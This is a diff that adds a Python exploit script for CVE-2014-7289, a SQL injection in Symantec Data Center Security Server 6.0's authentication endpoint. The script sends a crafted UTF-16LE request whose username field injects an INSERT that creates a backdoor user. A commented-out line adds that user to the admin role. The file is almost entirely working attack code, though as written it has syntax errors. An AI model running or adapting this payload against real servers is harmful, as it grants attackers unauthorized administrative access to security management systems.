sqli exploit example forCVE-2014-7289

Web_Security/SQLi/CVE-2014-7289_exploit.py

@@ -0,0 +1,43 @@
+#!/bin/env python
+# Reference: http:https://seclists.org/fulldisclosure/2015/Jan/91
+
+
+import httplib
+def send_request(host,data):
+ params = data
+ headers = {"AppFire-Format-Version": "1.0",
+ "AppFire-Charset": "UTF-16LE",
+ "Content-Type":"application/x-appfire",
+ "User-Agent":"Java/1.7.0_45",
+ }
+ conn = httplib.HTTPSConnection(host)
+ conn.request("POST", "/sis-ui/authenticate", params, headers)
+ response = conn.getresponse()
+ data=response.read()
+ conn.close() 
+ return response,data
+
+if __name__ = '__main__'
+ header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
+ data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
+ PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
+ PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
+ VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
+ '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
+ 07:13:23', '1', '0', '0',
+ 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
+ -- '' " # add user to USR table
+ #data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
+ ROLERID) VALUES (1504, 1); -- " # add user to admin group
+ data+="\r\nan=Symantec Data Center Security Server
+ 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
+ data = data.encode('utf-16le')
+
+ eof_flag="\nEOF_FLAG\n"
+ header = header %(len(data))
+ payload=header+data+eof_flag
+
+ response,data = send_request("<host>:4443",payload)
+
+ print data.decode('utf-16le')
+ print response.status